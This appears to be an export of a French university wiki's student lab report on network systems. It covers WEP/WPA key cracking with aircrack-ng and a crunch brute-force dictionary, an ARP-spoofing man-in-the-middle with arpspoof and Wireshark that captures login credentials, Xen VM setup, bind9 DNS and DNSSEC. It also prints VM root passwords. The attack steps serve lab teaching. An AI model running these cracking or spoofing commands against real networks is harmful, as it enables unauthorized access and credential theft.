    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54014</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54014"/>
				<updated>2020-11-27T17:13:51Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Architecture réseau */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168/26&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60a2:216:3eff:fe95:d093/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|http://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|https://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on ajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une passerelle doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interface avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comme ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
L'architecture du réseau est la suivante : &lt;br /&gt;
[[Fichier:Architecture2-MA2a5-2020_2021.JPG|1000px|thumb|left|Architecture du réseau]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le problème est que si on regarde le réseau n'est pas vraiment redondant : &lt;br /&gt;
&lt;br /&gt;
- Si on a une coupure de courant tout le réseau s'effondrent, dans l'idéale, il faudrait des onduleurs et un réseau électrique séparé pour la Baie1 et la Baie2/3&lt;br /&gt;
&lt;br /&gt;
- Le réseau ADSL n'est pas fonctionnelle donc si on perd le réseau Polytech on n'as plus accès aux machines.&lt;br /&gt;
&lt;br /&gt;
- Toutes les VM et les sites WEB sont sur la baie3 qui héberge le serveur de virtualisation Capbreton, si on perd la baie3 tout le système tombe.&lt;br /&gt;
&lt;br /&gt;
- Pour finir dans l'idéale les deux bais devrais être dans des bâtiments séparer en cas d'incendie, on risque de perdre les deux bais.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
On peux maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
Glue records fournis par Gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié notre DNS a une ip, il faut renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas Gandi ne pourras pas liée les DNS a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveuyrs de non configurer, on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon notre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commencer, on crée un répertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les renommer pour plus de transparence.&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
